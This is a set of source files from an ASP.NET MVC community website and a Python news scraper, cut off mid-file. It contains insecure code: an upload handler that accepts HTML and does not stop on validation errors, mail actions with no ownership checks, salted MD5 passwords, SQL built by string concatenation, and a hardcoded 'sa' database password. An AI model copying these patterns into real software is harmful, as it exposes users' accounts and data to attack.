"path": "/GDKQ.Web/Areas/Adm1n/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using LitJson;\nusing System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Globalization;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing GDKQ.Model;\nusing Common;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n public class HomeController : Controller\n {\n [Filter.AdminLoginFilter]\n //后台主页\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n int Advice = dal.Advice.Count(x => x.IsRead == true);\n int VotePercent = 62;\n int ArtcleNum= dal.Article.Count(x => x.Enable == false);\n int VisitNum = 654;\n List<Model.Article> listA = dal.Article.Where(x => x.Enable == false && x.IsDeleted == true).OrderByDescending(x \n => x.CreateTime).Take(10).ToList<Model.Article>();\n List<Model.Advice> listAD= dal.Advice.Where(x =>x.IsRead==true).OrderByDescending(x\n => x.CreateTime).Take(10).ToList<Model.Advice>();\n viewModel vm = new viewModel(Advice, VotePercent, ArtcleNum, VisitNum,listA,listAD);\n return View(vm);\n }\n\n public class viewModel\n {\n public List<Advice> listAD { get; set; }//建议列表\n public int Advice { get; set; }//建议\n public int VotePercent { get; set; }//投票\n public int ArtcleNum { get; set; }//文章审核\n public int VisitNum { get; set; }//访问统计\n public List<Model.Article> listA { get; set; }//文章列表\n\n public viewModel(int advice, int votePercent, int artcleNum, int visitNum, List<Article> listA, List<Advice> listAD)\n {\n this.Advice = advice;\n this.VotePercent = votePercent;\n this.ArtcleNum = artcleNum;\n this.VisitNum = visitNum;\n this.listA = listA;\n this.listAD = listAD;\n }\n }\n\n /// <summary>\n /// 上传列表图片\n /// </summary>\n /// <returns></returns>\n public ActionResult SaveMedia()\n {\n return Json(new { status = \"y\", info = \"上传成功\" });\n //HttpPostedFileBase imgFile = Request.Files[\"imgFile\"];\n }\n /// <summary>\n /// Kindeditor在线上传\n /// </summary>\n /// <returns></returns>\n public ActionResult Kindeditor_Upload()\n {\n //文件保存目录路径\n String savePath = \"/upload/\";\n\n\n //文件保存目录URL\n String saveUrl = \"/upload/\";\n\n //定义允许上传的文件扩展名\n Hashtable extTable = new Hashtable();\n extTable.Add(\"image\", \"gif,jpg,jpeg,png,bmp\");\n extTable.Add(\"flash\", \"swf,flv\");\n extTable.Add(\"media\", \"swf,flv,mp3,wav,wma,wmv,mid,avi,mpg,asf,rm,rmvb\");\n extTable.Add(\"file\", \"doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2\");\n\n //最大文件大小\n int maxSize = 1000000;\n\n HttpPostedFileBase imgFile = Request.Files[\"imgFile\"];\n if (imgFile == null)\n {\n showError(\"请选择文件。\");\n }\n\n String dirPath = Server.MapPath(savePath);\n if (!Directory.Exists(dirPath))\n {\n showError(\"上传目录不存在。\");\n }\n\n String dirName = Request.QueryString[\"dir\"];\n if (String.IsNullOrEmpty(dirName))\n {\n dirName = \"image\";\n }\n if (!extTable.ContainsKey(dirName))\n {\n showError(\"目录名不正确。\");\n }\n\n String fileName = imgFile.FileName;\n String fileExt = Path.GetExtension(fileName).ToLower();\n\n if (imgFile.InputStream == null || imgFile.InputStream.Length > maxSize)\n {\n showError(\"上传文件大小超过限制。\");\n }\n\n if (String.IsNullOrEmpty(fileExt) || Array.IndexOf(((String)extTable[dirName]).Split(','), fileExt.Substring(1).ToLower()) == -1)\n {\n showError(\"上传文件扩展名是不允许的扩展名。\\n只允许\" + ((String)extTable[dirName]) + \"格式。\");\n }\n\n //创建文件夹\n dirPath += dirName + \"/\";\n saveUrl += dirName + \"/\";\n if (!Directory.Exists(dirPath))\n {\n Directory.CreateDirectory(dirPath);\n }\n String ymd = DateTime.Now.ToString(\"yyyyMMdd\", DateTimeFormatInfo.InvariantInfo);\n dirPath += ymd + \"/\";\n saveUrl += ymd + \"/\";\n if (!Directory.Exists(dirPath))\n {\n Directory.CreateDirectory(dirPath);\n }\n\n String newFileName = DateTime.Now.ToString(\"yyyyMMddHHmmss_ffff\", DateTimeFormatInfo.InvariantInfo) + fileExt;\n String filePath = dirPath + newFileName;\n\n imgFile.SaveAs(filePath);\n\n String fileUrl = saveUrl + newFileName;\n\n Hashtable hash = new Hashtable();\n hash[\"error\"] = 0;\n hash[\"url\"] = fileUrl;\n Response.AddHeader(\"Content-Type\", \"text/html; charset=UTF-8\");\n Response.Write(JsonMapper.ToJson(hash));\n Response.End();\n return null;\n }\n\n private void showError(string message)\n {\n Hashtable hash = new Hashtable();\n hash[\"error\"] = 1;\n hash[\"message\"] = message;\n Response.AddHeader(\"Content-Type\", \"text/html; charset=UTF-8\");\n Response.Write(JsonMapper.ToJson(hash));\n Response.End();\n }\n }\n}" }, { "alpha_fraction": 0.5952380895614624, "alphanum_fraction": 0.6036414504051208, "avg_line_length": 22.032258987426758, "blob_id": "f46b64ad102006632b8e97036c0fdb76cf6e724f", "content_id": "ab2fa10b11946ffdff2fa65284bd7462fa607ae9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 714, "license_type": "no_license", "max_line_length": 55, "num_lines": 31, "path": "/GDKQ.Model/Photo.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Photo\")]\n public partial class Photo\n {\n public int ID { get; set; }\n\n [StringLength(10)]\n public string author { get; set; }\n\n [StringLength(10)]\n public string place { get; set; }\n\n public int like_count { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n [StringLength(64)]\n public string Title { get; set; }\n\n public string Body { get; set; }\n\n public string Url { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.4746987819671631, "alphanum_fraction": 0.4773494005203247, "avg_line_length": 32.20800018310547, "blob_id": "8184fe5004bf6c1460897e32b86b61e318e6ad2e", "content_id": "f18b82e3f5114ffb7dc4e2ac83fe68c57a4fd312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4314, "license_type": "no_license", "max_line_length": 182, "num_lines": 125, "path": "/GDKQ.Web/Areas/User/Controllers/MailController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n [Filter.UserLoginFilter]\n public class MailController : Controller\n {\n /// <summary>\n /// 邮件列表\n /// </summary>\n /// <returns></returns>\n public ActionResult List(int pageindex = 1)\n {\n int pagesize = 10;\n int total = 0;\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户资料\");\n }\n total = dal.Mail.Count(a => a.To_UID == u.ID&&a.IsDelect==true);\n List<Model.Mail> list0 = dal.Mail.Where(m => m.To_UID == u.ID && m.IsDelect == true).OrderBy(m=>m.IsRead).OrderBy(m => m.CreateTime).Skip((pageindex - 1) * pagesize).Take\n (pagesize).ToList<Model.Mail>();\n PagedList<GDKQ.Model.Mail> list = new PagedList<Model.Mail>(list0, pageindex, pagesize, total);\n ViewBag.username = ui.Nickname;\n return View(list);\n }\n\n \n public ActionResult Read(int Mail)\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u==null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui==null)\n {\n return Content(\"没有该用户资料\");\n }\n Model.Mail mail = dal.Mail.SingleOrDefault(x => x.ID == Mail);\n if (mail==null)\n {\n return Content(\"没有相关邮件信息\");\n }\n mail.IsRead = false;\n dal.SaveChanges();\n return View(mail);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Reply(string Mail,string Title,string Body)\n {\n int MailID= Convert.ToInt16(Mail);\n if (string.IsNullOrEmpty(Title)||string.IsNullOrEmpty(Body))\n {\n return Json(new { status = \"n\", info = \"请填写完整的回信信息\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户资料\");\n }\n Model.Mail mail = dal.Mail.SingleOrDefault(x => x.ID ==MailID);\n if (mail == null)\n {\n return Content(\"没有相关邮件信息\");\n }\n dal.Mail.Add(new Model.Mail()\n {\n Title = Title,\n Body = Body,\n CreateTime = DateTime.Now,\n From_UID = mail.To_UID,\n To_UID=mail.From_UID,\n From_Name=mail.To_Name,\n To_Name=mail.From_Name,\n IsDelect=true,\n IsRead=true,\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"回信成功\" });\n }\n\n\n public ActionResult Delect(string Mail)\n {\n int MailID= Convert.ToInt16(Mail);\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Mail m = dal.Mail.SingleOrDefault(x => x.ID == MailID);\n if (m==null)\n {\n return Content(\"没有相应邮件\");\n }\n m.IsDelect = false;\n dal.SaveChanges();\n return RedirectToAction(\"List\");\n }\n }\n}" }, { "alpha_fraction": 0.6671597361564636, "alphanum_fraction": 0.6671597361564636, "avg_line_length": 34.605262756347656, "blob_id": "dcff9177df42f81dc8db4d82b4d65be2f714265a", "content_id": "c1cb6d2319fb1b3e54557fcb0d75bdb659faa3cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 130, "num_lines": 38, "path": "/GDKQ.Web/Filter/UserLoginFilter.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Filter\n{\n \n public class UserLoginFilter :ActionFilterAttribute\n {\n public override void OnActionExecuting(ActionExecutingContext filterContext)\n {\n //HttpContext.Current.Response.Write(\"OnActionExecuting:正要准备执行Action的时候但还未执行时执行<br />\");\n if (HttpContext.Current.Session[\"user\"] == null)\n {\n HttpContext.Current.Response.Write(\"<script>alert('您无权访问该页面,请重新登录');location.href='/Login'</script>\");\n HttpContext.Current.Response.End();\n return;\n }\n }\n\n public override void OnActionExecuted(ActionExecutedContext filterContext)\n {\n //HttpContext.Current.Response.Write(\"OnActionExecuted:Action执行时但还未返回结果时执行<br />\");\n }\n\n public override void OnResultExecuting(ResultExecutingContext filterContext)\n {\n // HttpContext.Current.Response.Write(\"OnResultExecuting:OnResultExecuting也和OnActionExecuted一样,但前者是在后者执行完后才执行<br />\");\n }\n\n public override void OnResultExecuted(ResultExecutedContext filterContext)\n {\n // HttpContext.Current.Response.Write(\"OnResultExecuted:是Action执行完后将要返回ActionResult的时候执行<br />\");\n }\n }\n}" }, { "alpha_fraction": 0.5089776515960693, "alphanum_fraction": 0.5141077041625977, "avg_line_length": 34.45454406738281, "blob_id": "abac5465b3977f16f1633c95a0f9decd3944542f", "content_id": "2ca16d6c4dd274663e23d00a363433633d00cd1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2879, "license_type": "no_license", "max_line_length": 249, "num_lines": 77, "path": "/GDKQ.Web/Areas/User/Controllers/UserInfoModController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n public class UserInfoModController : Controller\n {\n // GET: User/UserInfoMod\n public ActionResult Index()\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户的资料\");\n }\n return View(ui);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Index(string Nickname,string password, string password1,string password2,string Hobby,string Gender,string Description)\n {\n if (string.IsNullOrEmpty(Nickname)|| string.IsNullOrEmpty(password) || string.IsNullOrEmpty(password1) || string.IsNullOrEmpty(password2) || string.IsNullOrEmpty(Hobby) || string.IsNullOrEmpty(Gender) ||string.IsNullOrEmpty(Description))\n {\n return Json(new { status = \"n\", info = \"请填写完整的修改信息\" });\n }\n if (password1!=password2)\n {\n return Json(new { status = \"n\", info = \"两次输入的新密码不一致\" });\n }\n if (password == password1)\n {\n return Json(new { status = \"n\", info = \"新密码不能与旧密码相同\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Json(new { status = \"n\", info = \"该用户不存在\" });\n }\n password += \"_GDKQ\";\n password = MD5.MD5Encrypt16(password);\n if (u.Password.ToLower() != password.ToLower())\n {\n return Json(new { status = \"n\", info = \"原密码错误,请重新输入\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Json(new { status = \"n\", info = \"找不到该用户资料\" });\n }\n password1 += \"_GDKQ\";\n password1 = MD5.MD5Encrypt16(password1);\n u.Password = password1;\n ui.Nickname = Nickname;\n ui.Hobby = Hobby;\n ui.Gender = Gender;\n ui.Description = Description;\n u.Nickname = Nickname;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"修改成功\", NextUrl = \"/User/Home/Index\" });\n }\n\n\n \n }\n}" }, { "alpha_fraction": 0.46735548973083496, "alphanum_fraction": 0.4732341766357422, "avg_line_length": 35.9309196472168, "blob_id": "c068815ff661de08e0c5c929e2eabd250869b85c", "content_id": "c820674c809281ef13e6dd927c2afa3d1dad7077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 12109, "license_type": "no_license", "max_line_length": 155, "num_lines": 304, "path": "/GDKQ.Web/Controllers/LoginController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Drawing;\nusing System.Drawing.Drawing2D;\nusing System.Drawing.Imaging;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Common;\nusing System.Text.RegularExpressions;\n\nnamespace GDKQ.Web.Controllers\n{\n public class LoginController : Controller\n {\n // GET: Login & Register\n public ActionResult Index()\n {\n Session.Abandon();\n return View();\n }\n\n #region\n public ActionResult SecurityCode()\n {\n string oldcode = TempData[\"SecurityCode\"] as string;\n string code = CreateRandomCode(4); //验证码的字符为4个\n TempData[\"SecurityCode\"] = code; //验证码存放在TempData中\n return File(CreateValidateGraphic(code), \"image/Jpeg\");\n }\n\n /// <summary>\n /// 生成随机的字符串\n /// </summary>\n /// <param name=\"codeCount\"></param>\n /// <returns></returns>\n public string CreateRandomCode(int codeCount)\n {\n string allChar = \"0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,a,b,c,d,e,f,g,h,i,g,k,l,m,n,o,p,q,r,F,G,H,I,G,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,s,t,u,v,w,x,y,z\";\n string[] allCharArray = allChar.Split(',');\n string randomCode = \"\";\n int temp = -1;\n Random rand = new Random();\n for (int i = 0; i < codeCount; i++)\n {\n if (temp != -1)\n {\n rand = new Random(i * temp * ((int)DateTime.Now.Ticks));\n }\n int t = rand.Next(35);\n if (temp == t)\n {\n return CreateRandomCode(codeCount);\n }\n temp = t;\n randomCode += allCharArray[t];\n }\n return randomCode;\n }\n\n /// <summary>\n /// 创建验证码图片\n /// </summary>\n /// <param name=\"validateCode\">验证码字符串</param>\n /// <returns>验证码图片</returns>\n public byte[] CreateValidateGraphic(string validateCode)\n {\n Bitmap image = new Bitmap((int)Math.Ceiling(validateCode.Length * 16.0), 27);\n Graphics g = Graphics.FromImage(image);\n try\n {\n //生成随机生成器\n Random random = new Random();\n //清空图片背景色\n g.Clear(Color.White);\n //画图片的干扰线\n for (int i = 0; i < 25; i++)\n {\n int x1 = random.Next(image.Width);\n int x2 = random.Next(image.Width);\n int y1 = random.Next(image.Height);\n int y2 = random.Next(image.Height);\n g.DrawLine(new Pen(Color.Silver), x1, x2, y1, y2);\n }\n Font font = new Font(\"Arial\", 13, (FontStyle.Bold | FontStyle.Italic));\n LinearGradientBrush brush = new LinearGradientBrush(new Rectangle(0, 0, image.Width, image.Height), Color.Blue, Color.DarkRed, 1.2f, true);\n g.DrawString(validateCode, font, brush, 3, 2);\n\n //画图片的前景干扰线\n for (int i = 0; i < 100; i++)\n {\n int x = random.Next(image.Width);\n int y = random.Next(image.Height);\n image.SetPixel(x, y, Color.FromArgb(random.Next()));\n }\n //画图片的边框线\n g.DrawRectangle(new Pen(Color.Silver), 0, 0, image.Width - 1, image.Height - 1);\n\n //保存图片数据\n MemoryStream stream = new MemoryStream();\n image.Save(stream, ImageFormat.Jpeg);\n\n //输出图片流\n return stream.ToArray();\n }\n finally\n {\n g.Dispose();\n image.Dispose();\n }\n }\n #endregion\n\n\n /// <summary>\n /// 登录验证\n /// </summary>\n /// <param name=\"username\">用户名</param>\n /// <param name=\"password\">密码</param>\n /// <param name=\"SecurityCode\">验证码</param>\n /// <returns></returns>\n [ValidateAntiForgeryToken()]\n [HttpPost]\n public ActionResult Admin(string username, string password, string SecurityCode)\n {\n if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n {\n return Json(new { status = \"n\", info = \"请输入验证码\" });\n }\n if (TempData[\"SecurityCode\"]==null)\n {\n return Content(\"出现错误了,重新登录试试\");\n }\n if ((SecurityCode.ToLower())!=((TempData[\"SecurityCode\"] as string).ToLower()))\n {\n return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n }\n\n if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n {\n return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n }\n password += \"_GDKQ\";\n password = MD5.MD5Encrypt16(password);\n Model.Admin a = new DAL.GDKQContext().Admin.SingleOrDefault(x => x.UserName == username && x.Password == password);\n if (a == null)\n {\n return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n }\n a.LastLoginIP = GetIPadress.GetHostAddress();\n a.LastLoginTime = DateTime.Now;\n Session[\"admin\"] = a;//创建Session\n return Json(new { status = \"y\", info = \"登录成功\" ,NextUrl= \"/Adm1n/Home/Index\" });\n }\n //↑管理员\n public ActionResult Villager(string username, string password, string SecurityCode)\n {\n if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n {\n return Json(new { status = \"n\", info = \"请输入验证码\" });\n }\n if ((SecurityCode.ToLower()) != ((TempData[\"SecurityCode\"] as string).ToLower()))\n {\n return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n }\n\n if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n {\n return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n }\n password += \"_GDKQ\";\n password = MD5.MD5Encrypt16(password);\n Model.Villager v = new DAL.GDKQContext().Villager.SingleOrDefault(x => x.UserName == username && x.Password == password);\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n }\n if (v.Enabled!=true)\n {\n return Json(new { status = \"n\", info = \"账号被冻结,请联系管理员\" });\n }\n v.LastLoginIP = GetIPadress.GetHostAddress();\n v.LastLoginTime = DateTime.Now;\n Session[\"villager\"] = v;//创建Session\n return Json(new { status = \"y\", info = \"登录成功\", NextUrl = \"/Home/Index\" });\n }\n //↑村民\n public new ActionResult User(string username, string password, string SecurityCode)\n {\n if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n {\n return Json(new { status = \"n\", info = \"请输入验证码\" });\n }\n if ((SecurityCode.ToLower()) != ((TempData[\"SecurityCode\"] as string).ToLower()))\n {\n return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n }\n\n if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n {\n return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n }\n password += \"_GDKQ\";\n password=MD5.MD5Encrypt16(password);\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.User u = dal.User.SingleOrDefault(x => x.UserName == username && x.Password == password);\n if (u == null)\n {\n return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n }\n if (u.Enabled != true)\n {\n return Json(new { status = \"n\", info = \"账号被冻结,请联系管理员\" });\n }\n u.LastLoginIP = GetIPadress.GetHostAddress();\n u.LastLoginTime = DateTime.Now;\n Session[\"user\"] = u;//创建Session\n return Json(new { status = \"y\", info = \"登录成功\", NextUrl = \"/User/Home\" });\n }\n //↑用户\n\n\n //用户注册\n public ActionResult Register(string usernamer, string passwordr, string passwordr2, string mail)\n {\n //if()//用户名是否重复\n //\n \n //用户名和密码校验\n if (string.IsNullOrEmpty(usernamer) || string.IsNullOrEmpty(passwordr)||string.IsNullOrEmpty(passwordr2)||string.IsNullOrEmpty(mail))\n {\n return Json(new { status = \"n\", info = \"请填写完整的注册信息\" });\n }\n\n if (passwordr2 != passwordr)\n {\n return Json(new { status = \"n\", info = \"两次输入的密码不一致,请重新输入\" });\n }\n\n Regex Verification = new Regex(\"^[a-zA-Z]\\\\w{5,15}$\");\n if (!Verification.IsMatch(usernamer))\n {\n return Json(new { status = \"n\", info = \"请注意用户名格式\" });\n }\n Verification = new Regex(\"\\\\w{5,15}$\");\n if (!Verification.IsMatch(passwordr))\n {\n return Json(new { status = \"n\", info = \"请注意密码格式\" });\n }\n \n Verification = new Regex(\"^\\\\s*([A-Za-z0-9_-]+(\\\\.\\\\w+)*@(\\\\w+\\\\.)+\\\\w{2,5})\\\\s*$\");\n if (!Verification.IsMatch(mail))\n {\n return Json(new { status = \"n\", info = \"请输入正确的邮箱格式\" });\n }\n\n //验证用户名是否已经注册\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.User u = dal.User.SingleOrDefault(x => x.Password == passwordr);\n if (u!=null)\n {\n return Json(new { status = \"n\", info = \"该用户名已经被注册了,请更换用户名\" });\n }\n\n //数据库添加用户\n passwordr += \"_GDKQ\";\n passwordr = MD5.MD5Encrypt16(passwordr);\n dal.User.Add(new Model.User()\n {\n UserName = usernamer,\n Password = passwordr,\n CreatTime = DateTime.Now,\n LastLoginTime = DateTime.Now,\n LastLoginIP = GetIPadress.GetHostAddress(),\n Enabled = true,\n IsDeleted = true,\n });\n dal.SaveChanges();\n Model.User uu = dal.User.SingleOrDefault(x => x.UserName == usernamer && x.Password == passwordr);\n if (uu==null)\n {\n return Json(new { status = \"n\", info = \"bug\" });\n }\n\n dal.UserInfo.Add(new Model.UserInfo()\n {\n UserID = uu.ID,\n Nickname = \"萌新\"+uu.ID,\n Hobby = \"暂无\",\n Gender = \"男\",\n Description = \"这家伙很懒,啥都没写\",\n Photo = \"/Content/assets/img/toux1.jpg\",\n RealName = \"保密\",\n });\n uu.Nickname += uu.ID;\n dal.SaveChanges();\n //创建session\n Session[\"user\"] = uu;\n return Json(new { status = \"y\", info = \"注册成功\", NextUrl = \"/User/Home/Index\" });\n }\n }\n \n}\n" }, { "alpha_fraction": 0.5764914155006409, "alphanum_fraction": 0.6072061657905579, "avg_line_length": 40.29268264770508, "blob_id": "750a4ea9b794f02a9087043a109a4202f4234561", "content_id": "83859b2b9cb5ef8cc9116e6f502c893e06cb7ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 222, "num_lines": 41, "path": "/Python爬虫文件/main.py", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "#coding='utf-8'\nimport requests\nimport pyodbc\nimport re\nfrom bs4 import BeautifulSoup\n\nurl='http://www.zjtz.gov.cn/col/col14/index.html'\nheaders = {'user-agent': 'my-app/0.0.1'}\nres=requests.get(url,timeout=500,headers=headers)\nres.encoding='utf-8'\ntemp=res.text.replace('&lt;','<').replace('&gt;','>').replace('&amp;','&').replace('![CDATA[','').replace(']]','').replace('&quot;','\"').replace('$apos;',\"'\")\nsoup=BeautifulSoup(temp,'html.parser')\ncnxn =pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=GDKQ_DB;UID=sa;PWD=123456')\ncursor = cnxn.cursor()\n\n\nurls='http://www.zjtz.gov.cn'\nfor i in soup.select('#6184')[0].find_all(\"a\")[1:]:\n realurl=urls+i.get(\"href\")\n print(realurl)\n res2 = requests.get(realurl)\n res2.encoding = 'utf-8'\n soup2 = BeautifulSoup(res2.text, 'html.parser')\n # print('标题:' + soup2.select('#title')[0].text.strip() + '\\n' + '日期和来源:' + soup2.find(style=\"font-size:12px; color:#999; line-height:24px; padding-top:10px;\").text.strip() + '\\n' +'正文内容:'+ soup2.select('#zoom')[0].text)\n # print(\"---------------------------------\")\n\n\t\n #print(TurlBody)\n #tempstring='insert into dbo.Py_Spider(Title, Body) values (%s,%s)'\n #tempstring.format(Title,TurlBody)\n #temp=re.findall('%S*',)\n #print(temp)\n #print(soup2.select('#zoom')[0])\n #sfjgkl=str(soup2.select('#zoom')[0].content)\n var1=\"台州政府网 \" #Author\n var2=\"001\"#bh\n sadf=\"insert into dbo.News(Title, Body,Author,bh,CaName) values (\"+\"'\"+soup2.select('#title')[0].text.strip()+\"'\"+\",\"+\"'\"+soup2.select('#zoom')[0].text.strip()+\"'\"+\",\"+\"'\"+var1+\"'\"+\",\"+\"'\"+var2+\"'\"+\",\"+\"'\"+var3+\"'\"+\")\"\n #print(sadf)\n #公示公告\n cursor.execute(sadf)\n cnxn.commit()\n" }, { "alpha_fraction": 0.4896385669708252, "alphanum_fraction": 0.4934939742088318, "avg_line_length": 31.4375, "blob_id": "50f6842930c8ac5ac2886e3c82df2f55dcf6abdd", "content_id": "3516d50a8d4d9a7fd03b79a47827dca60050c0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2179, "license_type": "no_license", "max_line_length": 123, "num_lines": 64, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/AffairController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n public class AffairController : Controller\n {\n // GET: Livelihood/Affair\n public ActionResult List(string bh, int pageindex = 1)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n if (ca == null)\n {\n return Content(\"没有该分类的新闻!\");\n }\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n total = dal.News.Count(x => x.bh == ca.bh && x.IsDeleted == true);\n if (total < 1)\n {\n return Content(\"数据库中没有该新闻!\");\n }\n List<Model.News> list0 = dal.News.Where(\n x => x.bh == ca.bh && x.IsDeleted == true).OrderByDescending(a=>a.CreateTime).Take(6).ToList<Model.News>();\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n ViewBag.Title = ca.CaName;\n ViewBag.bh = ca.bh;\n\n return View(list);\n }\n\n public ActionResult Advice(string Body)\n {\n string FromName;\n if (string.IsNullOrEmpty(Body))\n {\n return Json(new { status = \"n\", info = \"请填写建议!\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n FromName = \"匿名\";\n }\n else {\n FromName = u.Nickname;\n }\n dal.Advice.Add(new Model.Advice()\n {\n Body = Body,\n CreateTime = DateTime.Now,\n IsRead = true,\n From_Name=FromName\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"感谢您的建议,我们会尽快改进的!\" });\n }\n }\n}" }, { "alpha_fraction": 0.4620586037635803, "alphanum_fraction": 0.46675431728363037, "avg_line_length": 27.475934982299805, "blob_id": "ffafc905a365a9bf8e4948910264e39839b0c45d", "content_id": "91ec1132c675a3939ee1adb79e982ce237b9d455", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5580, "license_type": "no_license", "max_line_length": 165, "num_lines": 187, "path": "/GDKQ.Web/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Controllers\n{\n /// <summary>\n /// 新闻控制器\n /// </summary>\n public class NewsController : Controller\n {\n /// <summary>\n /// 逆旅千古\n /// </summary>\n /// <param name=\"bh\">11</param>\n /// <returns></returns>\n public ActionResult OnePage(string bh)\n {\n Model.News n = new DAL.GDKQContext().News.SingleOrDefault(a => a.bh == bh);\n if (n==null)\n {\n return Content(\"暂无该新闻\");\n }\n 